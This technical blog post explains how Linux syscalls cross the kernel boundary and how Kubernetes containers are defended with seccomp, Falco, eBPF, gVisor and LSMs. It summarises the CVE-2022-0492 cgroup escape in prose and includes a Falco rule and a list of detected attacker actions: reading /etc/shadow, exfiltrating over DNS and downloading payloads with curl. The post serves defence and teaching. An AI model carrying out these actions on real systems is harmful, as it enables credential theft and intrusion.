&lt;p&gt;&lt;strong&gt;The staff-level takeaway:&lt;/strong&gt; every time the kernel adds a new high-performance I/O interface, it adds a new attack surface that existing seccomp profiles don't cover. &lt;code&gt;io_uring&lt;/code&gt; is the canonical example. Your seccomp profile graduation pipeline must account for new kernel subsystems, not just new individual syscalls.&lt;/p&gt;





&lt;h2&gt;
  
  
  The CPU Privilege Model
&lt;/h2&gt;

&lt;p&gt;To understand why syscalls exist, you need to understand how CPUs enforce privilege boundaries.&lt;/p&gt;

&lt;p&gt;Modern x86-64 processors have &lt;strong&gt;four privilege rings&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9z05jfmz5moqtak6mdad.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9z05jfmz5moqtak6mdad.png" alt="image" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linux only uses Ring 0 (kernel) and Ring 3 (user). When your application executes the &lt;code&gt;syscall&lt;/code&gt; instruction, the CPU immediately:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Saves the current register state&lt;/li&gt;
&lt;li&gt;Switches to kernel mode (Ring 0)&lt;/li&gt;
&lt;li&gt;Jumps to the kernel's syscall handler&lt;/li&gt;
&lt;li&gt;Executes the requested operation&lt;/li&gt;
&lt;li&gt;Restores registers and returns to Ring 3&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This mode switch is the &lt;em&gt;only&lt;/em&gt; sanctioned transition. Without it, user-space code cannot touch kernel data structures, physical memory, or hardware. It's a hardware-enforced boundary — not a software convention.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The critical insight for container security:&lt;/strong&gt; this boundary is per-kernel, not per-container. When two containers run on the same node, they use the same syscall gateway into the same kernel. A syscall that bypasses a kernel check escapes both containers simultaneously.&lt;/p&gt;





&lt;h2&gt;
  
  
  Anatomy of a Syscall
&lt;/h2&gt;

&lt;p&gt;Let's trace a concrete example. Suppose a Go HTTP server accepts a connection and reads the request body.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5fa3ksnpnkaqrmkb4ns8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5fa3ksnpnkaqrmkb4ns8.png" alt="image" width="800" height="369"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What looks like a single &lt;code&gt;conn.Read()&lt;/code&gt; call results in:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One or more &lt;code&gt;read(2)&lt;/code&gt; syscalls on the socket file descriptor&lt;/li&gt;
&lt;li&gt;The kernel checking the process's permissions, the socket state, and available data&lt;/li&gt;
&lt;li&gt;A DMA transfer from the NIC's ring buffer into kernel memory, then copied to user space&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every one of those kernel checks is a potential security enforcement point — and every kernel bug in that path is a potential vulnerability reachable from your container.&lt;/p&gt;





&lt;h2&gt;
  
  
  How Containers Change the Equation
&lt;/h2&gt;

&lt;p&gt;A VM gives each workload its own kernel. A container does not.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgmemqiu8sirf2ohf4kh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgmemqiu8sirf2ohf4kh.png" alt="image" width="800" height="106"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Containers get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PID namespace&lt;/strong&gt; — isolated process tree&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network namespace&lt;/strong&gt; — isolated network stack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mount namespace&lt;/strong&gt; — isolated filesystem view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cgroups&lt;/strong&gt; — CPU/memory resource limits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Containers do &lt;strong&gt;not&lt;/strong&gt; get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Their own kernel&lt;/li&gt;
&lt;li&gt;Their own syscall table&lt;/li&gt;
&lt;li&gt;Kernel memory isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This does &lt;strong&gt;not&lt;/strong&gt; mean containers have zero isolation. Multiple mechanisms reduce the blast radius of a kernel compromise:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Namespaces&lt;/strong&gt; — restrict what a container can see (PIDs, mounts, network)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cgroups&lt;/strong&gt; — bound resource consumption&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Capabilities&lt;/strong&gt; — limit the privilege set a container process holds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;seccomp&lt;/strong&gt; — restrict which syscalls can be made at all&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LSMs (AppArmor/SELinux)&lt;/strong&gt; — enforce mandatory access controls even on permitted syscalls&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These work as &lt;strong&gt;defence-in-depth layers&lt;/strong&gt;, not as kernel isolation equivalents. A VM still provides a fundamentally stronger boundary because kernel bugs in one tenant cannot affect another tenant's kernel. But a well-configured container is far harder to escape than a bare process.&lt;/p&gt;

&lt;p&gt;The shared kernel is still the decisive fact: if Container A can trigger a kernel bug via a syscall — say, a privilege escalation in &lt;code&gt;clone()&lt;/code&gt; or a heap overflow in &lt;code&gt;io_uring&lt;/code&gt; — it affects the host and every other container on that node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real scenario:&lt;/strong&gt; In 2022, &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt; found a missing capability check in the kernel's &lt;code&gt;cgroup_release_agent_write&lt;/code&gt; function. The kernel failed to verify that the calling process held &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the &lt;em&gt;initial&lt;/em&gt; user namespace. A container process could call &lt;code&gt;unshare()&lt;/code&gt; to create a new user namespace and cgroup namespace, mount cgroupfs inside it, then write an arbitrary host binary path to &lt;code&gt;release_agent&lt;/code&gt; — all without elevated host privileges. When the cgroup became empty, the kernel executed that binary as root on the host. Zero memory corruption: just &lt;code&gt;unshare()&lt;/code&gt;, &lt;code&gt;mount()&lt;/code&gt;, and &lt;code&gt;write()&lt;/code&gt; syscalls in the right sequence. &lt;strong&gt;Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable&lt;/strong&gt; — those layers blocked the required &lt;code&gt;mount()&lt;/code&gt; and &lt;code&gt;unshare()&lt;/code&gt; calls. Only permissive configurations (no seccomp, no MAC) were at risk.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Kubernetes Security Stack — Layer by Layer
&lt;/h2&gt;

&lt;p&gt;Given that containers share a kernel, how do you defend the syscall boundary? There are five complementary mechanisms — each operating at a different point in the syscall path:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgsign4hiq9113z0z4v6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgsign4hiq9113z0z4v6.png" alt="image" width="800" height="976"&gt;&lt;/a&gt;&lt;/p&gt;





&lt;h3&gt;
  
  
  seccomp: Your Syscall Firewall
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://lwn.net/Articles/656307/" rel="noopener noreferrer"&gt;seccomp&lt;/a&gt;&lt;/strong&gt; (Secure Computing Mode) is a Linux kernel feature that lets you attach a BPF filter to a process. The filter is evaluated on every syscall &lt;em&gt;before&lt;/em&gt; the kernel executes it. When a syscall is not allowed, the filter's configured action determines the outcome — it is not always a simple &lt;code&gt;EPERM&lt;/code&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;seccomp Action&lt;/th&gt;
&lt;th&gt;Behaviour&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ALLOW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Syscall proceeds normally&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Returns an error code (e.g. &lt;code&gt;EPERM&lt;/code&gt;) — the default for RuntimeDefault&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_KILL_PROCESS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Immediately kills the process — used for highest-risk syscalls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_LOG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Logs the syscall, allows it — useful for audit-mode profiling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_TRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Notifies a &lt;code&gt;ptrace&lt;/code&gt; tracer — used for policy development tooling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sends the event to a user-space supervisor via fd — enables policy agents&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The Kubernetes &lt;code&gt;RuntimeDefault&lt;/code&gt; profile uses &lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt; for disallowed syscalls. Custom profiles can mix actions — kill on &lt;code&gt;ptrace&lt;/code&gt;, log on unknown syscalls during a grace period, and allow everything else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; seccomp is a bouncer at the kernel's door. Your app can only get in if the syscall is on the guest list.&lt;/p&gt;

&lt;p&gt;Kubernetes exposes this via &lt;code&gt;seccompProfile&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;seccompProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeDefault&lt;/span&gt;   &lt;span class="c1"&gt;# containerd/docker's default profile&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-server&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;RuntimeDefault&lt;/code&gt; profile blocks ~44 high-risk syscalls, including:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Syscall&lt;/th&gt;
&lt;th&gt;Why it's dangerous&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ptrace&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allows one process to inspect/modify another's memory. Classic injection vector.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;clone&lt;/code&gt; (namespace-creating flags only)&lt;/td&gt;
&lt;td&gt;The profile blocks &lt;code&gt;CLONE_NEWUSER&lt;/code&gt; and &lt;code&gt;CLONE_NEWNS&lt;/code&gt; flag combinations — not &lt;code&gt;clone&lt;/code&gt; itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;syslog&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Reads kernel message buffer. Information disclosure.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;perf_event_open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Side-channel attack surface (Spectre-class).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;keyctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Access to kernel keyring. Credential theft.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bpf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load eBPF programs. Privilege escalation surface.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;For high-security workloads, &lt;code&gt;RuntimeDefault&lt;/code&gt; isn't enough.&lt;/strong&gt; You want a custom profile scoped to what your specific workload actually calls. Here's the workflow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F436rlv4kbvfgwp4qy25i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F436rlv4kbvfgwp4qy25i.png" alt="image" width="800" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production tip:&lt;/strong&gt; Start with &lt;code&gt;RuntimeDefault&lt;/code&gt;, instrument with Falco to surface unexpected &lt;code&gt;EPERM&lt;/code&gt; failures, then tighten to a custom profile over one or two release cycles. Don't try to go from zero to custom profile in one shot — you'll break things.&lt;/p&gt;





&lt;h3&gt;
  
  
  Falco: Syscall-Level Runtime Detection
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt;&lt;/strong&gt; (CNCF project) hooks into the kernel's syscall stream — via a kernel module or an eBPF probe — and evaluates every syscall event against a rule engine in user space.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhyj5ezg1zmis0ha9vev5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhyj5ezg1zmis0ha9vev5.png" alt="image" width="800" height="288"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Falco rules are expressive and context-aware:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Shell Spawned in Container&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;A shell was spawned in a container that should not run shells&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container and&lt;/span&gt;
    &lt;span class="s"&gt;shell_procs and&lt;/span&gt;
    &lt;span class="s"&gt;not proc.pname in (allowed_parents)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Shell spawned in container&lt;/span&gt;
    &lt;span class="s"&gt;(pod=%k8s.pod.name ns=%k8s.ns.name&lt;/span&gt;
     &lt;span class="s"&gt;cmd=%proc.cmdline parent=%proc.pname&lt;/span&gt;
     &lt;span class="s"&gt;image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why Falco catches what application-level monitoring misses:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;All behavior — no matter how sophisticated — eventually becomes syscalls. An attacker who compromises your app and tries to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Read &lt;code&gt;/etc/shadow&lt;/code&gt; → &lt;code&gt;openat()&lt;/code&gt; syscall → Falco sees it&lt;/li&gt;
&lt;li&gt;Exfiltrate data via DNS → &lt;code&gt;socket()&lt;/code&gt; + &lt;code&gt;connect()&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;li&gt;Escalate privileges → &lt;code&gt;setuid()&lt;/code&gt; / &lt;code&gt;clone()&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;li&gt;Download a second-stage payload → &lt;code&gt;execve("curl", ...)&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No agent in your application code. No SDK to integrate. Pure kernel-level observation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Staff-level consideration:&lt;/strong&gt; Falco's event throughput on a busy node can be high — 100k+ syscall events/sec on a heavily loaded API server node. You need to think about the Falco deployment model (DaemonSet with kernel module vs. eBPF probe), rule cardinality, and alert fatigue suppression from the start. Falco's &lt;strong&gt;modern eBPF probe&lt;/strong&gt; requires kernel ≥5.8 (for BPF ring buffer and BTF/CO-RE support) and has been the &lt;em&gt;default&lt;/em&gt; driver since Falco 0.38.0 — it is bundled directly in the Falco binary, requiring no separate kernel module compilation. In Falco 0.43.0, the &lt;strong&gt;legacy eBPF probe&lt;/strong&gt; (&lt;code&gt;engine.kind=ebpf&lt;/code&gt;) was deprecated (not the kernel module — &lt;code&gt;kmod&lt;/code&gt; remains supported for older kernels). The driver decision tree in production: kernel ≥5.8 → modern eBPF (default, zero driver download); kernel &amp;lt;5.8 → kernel module (&lt;code&gt;kmod&lt;/code&gt;), which requires matching kernel headers and breaks on kernel upgrades.&lt;/p&gt;





&lt;h3&gt;
  
  
  eBPF: Programmable Kernel Hooks
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;eBPF&lt;/strong&gt; (extended Berkeley Packet Filter) is one of the most significant additions to the Linux kernel in the last decade. It lets you load sandboxed programs into the kernel that execute at specific hook points — including syscall entry and exit — without modifying kernel source or loading full kernel modules.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsycphg0q6lhq4xdfmz7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsycphg0q6lhq4xdfmz7.png" alt="image" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The verifier is the key safety property: before any eBPF program executes in the kernel, the verifier statically proves it terminates, doesn't access invalid memory, and can't crash the kernel. This gives you programmable kernel instrumentation without the risk of a buggy kernel module taking down the node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Kubernetes tooling uses eBPF:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;eBPF Hook&lt;/th&gt;
&lt;th&gt;What it achieves&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://cilium.io/" rel="noopener noreferrer"&gt;Cilium&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tc&lt;/code&gt;, &lt;code&gt;xdp&lt;/code&gt;, socket hooks&lt;/td&gt;
&lt;td&gt;L3/L4/L7 network policy without iptables&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://tetragon.io/" rel="noopener noreferrer"&gt;Tetragon&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;kprobe&lt;/code&gt;, &lt;code&gt;tracepoint&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Enforce policy at kernel function level (not just syscall boundary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://px.dev/" rel="noopener noreferrer"&gt;Pixie&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uprobe&lt;/code&gt; + syscall hooks&lt;/td&gt;
&lt;td&gt;Capture HTTP headers, SQL queries, gRPC frames without app changes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://www.parca.dev/" rel="noopener noreferrer"&gt;Parca&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;perf_event&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Continuous CPU profiling with stack traces&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tracepoint / raw syscall&lt;/td&gt;
&lt;td&gt;Runtime security event stream&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Staff-level insight:&lt;/strong&gt; The shift from iptables/ipvs to eBPF-based networking (Cilium) is not just a performance improvement. It's a security architecture change. With iptables, policy is evaluated at netfilter hooks — after the syscall has returned and the packet is already in the kernel's network stack. With eBPF XDP, you can drop packets in the NIC driver's receive path, right after DMA has delivered them into the ring buffer and before the kernel allocates any socket-buffer state. The enforcement point moves earlier in the execution path.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack.&lt;/li&gt;
&lt;li&gt;DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention.&lt;/li&gt;
&lt;/ul&gt;





&lt;h3&gt;
  
  
  gVisor: The User-Space Kernel
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://gvisor.dev/" rel="noopener noreferrer"&gt;gVisor&lt;/a&gt;&lt;/strong&gt; takes a fundamentally different approach: instead of filtering which syscalls your container can make, it intercepts &lt;em&gt;all&lt;/em&gt; syscalls and handles them in a user-space kernel called the &lt;strong&gt;&lt;a href="https://github.com/google/gvisor/blob/master/pkg/sentry/kernel/README.md" rel="noopener noreferrer"&gt;Sentry&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftqtih4isilo4zgu5brlc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftqtih4isilo4zgu5brlc.png" alt="image" width="800" height="97"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Sentry is written in Go and implements the Linux syscall ABI (Application Binary Interface). When your container app calls &lt;code&gt;open()&lt;/code&gt;, the Sentry handles it — checking permissions, managing file descriptors — using only a narrow set of host syscalls to do so. The host kernel's attack surface shrinks from ~450 syscalls to &lt;strong&gt;a few dozen&lt;/strong&gt; host syscalls. Per gVisor's own security documentation, this is in the range of 53–68 depending on whether networking (Netstack) is enabled — but this figure varies by platform and gVisor version. The key invariant: &lt;strong&gt;no syscall is ever passed through directly&lt;/strong&gt;. Each one has an independent implementation inside the Sentry, so even if the Sentry's syscall handling has a bug, the host kernel's full attack surface is never exposed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this is deployed:&lt;/strong&gt; Google Cloud Run and GKE Sandbox use gVisor. If you run untrusted code (user-submitted functions, multi-tenant FaaS), gVisor is the right choice. For trusted first-party workloads, the overhead (10–15% latency increase on I/O-heavy workloads) may not be justified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The tradeoff is explicit:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attack surface reduction = performance cost
More isolation           = more overhead
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;seccomp + eBPF gets you 80% of the protection at ~1% overhead. gVisor gets you 99% protection at 10–15% overhead. Choose based on your threat model.&lt;/p&gt;





&lt;h3&gt;
  
  
  LSMs: Mandatory Access Controls
&lt;/h3&gt;

&lt;p&gt;seccomp decides &lt;em&gt;which syscalls&lt;/em&gt; a process can make. &lt;strong&gt;Linux Security Modules (LSMs)&lt;/strong&gt; decide &lt;em&gt;what those syscalls can do&lt;/em&gt; — even after they've been permitted.&lt;/p&gt;

&lt;p&gt;The distinction matters. A container's seccomp profile might allow &lt;code&gt;openat()&lt;/code&gt; (it's fundamental to almost every workload). An LSM then enforces &lt;em&gt;which paths&lt;/em&gt; that &lt;code&gt;openat()&lt;/code&gt; can access. The syscall passes seccomp; the kernel's LSM hook fires before the file is opened; access is denied.&lt;/p&gt;

